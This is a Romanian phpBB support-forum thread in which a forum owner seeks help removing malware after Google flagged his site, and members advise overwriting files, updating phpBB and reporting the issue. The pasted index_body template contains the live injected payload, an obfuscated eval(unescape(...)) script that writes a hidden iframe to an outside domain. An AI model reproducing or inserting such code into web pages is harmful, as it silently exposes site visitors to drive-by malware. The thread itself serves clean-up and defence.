Pagina 1 din 1
Forum phpbb3 banat de google
Scris: 29-Iun-2010, 14:57:42
de |^Wind^|
Forumul meu phpbb3 a ajuns sa fie infectat cu virusi malware si totodata banat de google.Acum problema este alta,am accesat "google.com/webmasters/tools" ,acolo arata ca fisierele
Cod: Selectaţi tot
/forum/memberlist.php
/forum/
/forum/memberlist.php?ltr=V&pp=30&sort=username&order=asc
sunt infectate cu virusi.
Am editat memberlist.php ba chiar lam inlocuit cu cel original de pe phpbb si am scos codul acela din el
Din curiozitate am vrut sa aflu daca acel cod se mai afla pe forumul meu si cu stupoare gasisem codul in footer jos de tot pe linia 1900 ,asta fiind in index am dat source din browser de pe IE
Adresa forumului este "alfagames[dot]ro"
Va rog ajutima si pe mine sa scot acest virus
Multumesc!
Re: Forum phpbb3 banat de google
Scris: 29-Iun-2010, 16:56:03
de bogdan
De ce nu iti scanezi toate fisierele cu un antivirus/adware bun?
Ai instalat ceva MOD-uri? Daca nu, cel mai sigur e sa suprascrii toate fisierele forumului mai putin config.php din radacina.
Re: Forum phpbb3 banat de google
Scris: 29-Iun-2010, 17:39:10
de |^Wind^|
da am instalate activity stats 24 h,top five,user avertisments
Dar mai am de scos un singur cod dala infectat dar nu stiu unde il gasesc
e undeva in footer pe lina 1900
in overall_footer nu e sigur
EDIT : lam gasit
Cod: Selectaţi tot
<!-- INCLUDE overall_header.html -->
<!-- INCLUDE forumlist_body.html -->
<!-- IF not S_IS_BOT or U_TEAM -->
<span class="gensmall"><!-- IF not S_IS_BOT --><a href="{U_DELETE_COOKIES}">{L_DELETE_COOKIES}</a><!-- ENDIF --><!-- IF not S_IS_BOT and U_TEAM --> | <!-- ENDIF --><!-- IF U_TEAM --><a href="{U_TEAM}">{L_THE_TEAM}</a><!-- ENDIF --></span><br />
<!-- ENDIF -->
<br clear="all" />
<!-- INCLUDE breadcrumbs.html -->
<!-- INCLUDE top_five_body.html -->
<!-- IF S_DISPLAY_ONLINE_LIST -->
<br clear="all" />
<table class="tablebg" width="100%" cellspacing="1">
<tr>
<td class="cat" colspan="2"><!-- IF U_VIEWONLINE --><h4><a href="{U_VIEWONLINE}">{L_WHO_IS_ONLINE}</a></h4><!-- ELSE --><h4>{L_WHO_IS_ONLINE}</h4><!-- ENDIF --></td>
</tr>
<tr>
<!-- IF LEGEND -->
<!-- ELSE -->
<!-- ENDIF -->
<td class="row1" width="100%"><span class="genmed">{TOTAL_USERS_ONLINE} ({L_ONLINE_EXPLAIN})<br />{RECORD_USERS}<br /><br />{LOGGED_IN_USER_LIST}</span></td>
</tr> <!-- IF not S_IS_BOT -->
<tr>
<td class="row1">{USERS_24HOUR_TOTAL}: <!-- BEGIN lastvisit -->{lastvisit.USERNAME_FULL}<!-- IF not lastvisit.S_LAST_ROW -->, <!-- ENDIF --><!-- END lastvisit --></td>
</tr>
<!-- ENDIF -->
<!-- IF LEGEND -->
<tr>
<td class="row1"><b class="gensmall">{L_LEGEND} AlfaGames.Ro :: [ {LEGEND} ]</b></td>
</tr>
<!-- ENDIF -->
</table>
<!-- ENDIF -->
<!-- IF S_DISPLAY_BIRTHDAY_LIST -->
<br clear="all" />
<table class="tablebg" width="100%" cellspacing="1">
<tr>
<td class="cat" colspan="2"><h4>{L_BIRTHDAYS}</h4></td>
</tr>
<tr>
<td class="row1" width="100%"><p class="genmed"><!-- IF BIRTHDAY_LIST -->{L_CONGRATULATIONS}: <b>{BIRTHDAY_LIST}</b><!-- ELSE -->{L_NO_BIRTHDAYS}<!-- ENDIF --></p></td>
</tr>
</table>
<!-- ENDIF -->
<br clear="all" />
<table class="tablebg" width="100%" cellspacing="1">
<tr>
<td class="cat" colspan="2"><h4>{L_STATISTICS}</h4></td>
</tr>
<tr>
<td class="row1" width="100%" valign="middle"><p class="genmed">{TOTAL_POSTS} | {TOTAL_TOPICS} | {TOTAL_USERS} | {NEWEST_USER}</p></td>
</tr>
</table>
<!-- IF not S_IS_BOT -->
<br clear="all" />
<table class="tablebg" width="100%" cellspacing="1">
<tr>
<td class="cat" colspan="2"><h4>{L_24HOUR_STATS}</h4></td>
</tr>
<tr>
<td class="row1" width="100%" valign="middle"><p class="genmed">{24HOUR_POSTS} | {24HOUR_TOPICS} | {24HOUR_USERS}</p></td>
</tr>
</table>
<!-- ENDIF -->
<!-- IF not S_USER_LOGGED_IN -->
<br clear="all" />
<form method="post" action="{S_LOGIN_ACTION}">
<table class="tablebg" width="100%" cellspacing="1">
<tr>
<td class="cat"><h4><a href="{U_LOGIN_LOGOUT}">{L_LOGIN_LOGOUT}</a></h4></td>
</tr>
<tr>
<td class="row1" align="center"><span class="genmed">{L_USERNAME}:</span> <input class="post" type="text" name="username" size="10" /> <span class="genmed">{L_PASSWORD}:</span> <input class="post" type="password" name="password" size="10" /> <!-- IF S_AUTOLOGIN_ENABLED --> <span class="gensmall">{L_LOG_ME_IN}</span> <input type="checkbox" class="radio" name="autologin" /><!-- ENDIF --> <input type="submit" class="btnmain" name="login" value="{L_LOGIN}" /></td>
</tr>
</table>
{S_FORM_TOKEN}
</form>
<!-- ENDIF -->
<!-- INCLUDE overall_footer.html --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%68%6F%72%65%77%64%74%2E%63%6F%6D%2F%3F%31%33%34%31%39%38%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
e din index_body din tema
Codul infectat este imd dupa <!-- INCLUDE overall_footer.html -->
Re: Forum phpbb3 banat de google
Scris: 29-Iun-2010, 18:08:12
de bogdan
Au mai patit-o si altii:
http://www.velocityreviews.com/forums/t ... cript.html
Asigura-te ca mentii phpBB3 actualizat si limiteaza folosirea MOD-ului. Eventual poti deschide un raport de securitate la phpBB.com si ei vor investiga problema:
http://www.phpbb.com/security/phpbb3/
Re: Forum phpbb3 banat de google
Scris: 29-Iun-2010, 18:15:16
de |^Wind^|
phpbb3 este la zi, nu am decat 2-3 moduri instalate
Din cate vad acest cod imi modifica fisierele html,am gasit in template in tema o groaza de coduri dinastea si leam inlaturat sunt convins ca in 24 de ore sigur va merge forumul
Multumesc pt supportul acordat
Re: Forum phpbb3 banat de google
Scris: 29-Iun-2010, 18:43:00
de bogdan
O sa mearga dar va trebui sa identifici cum s-a ajuns la modificarea codului ca sa eviti sa se intample din nou.
Eu as deschide un raport la phpbb.com
Re: Forum phpbb3 banat de google
Scris: 03-Iul-2010, 16:24:19
de Ivan Petre Paul
De asemenea asigura-te ca intotdeauna descarci MOD-uri de pe phpBB.ro/com.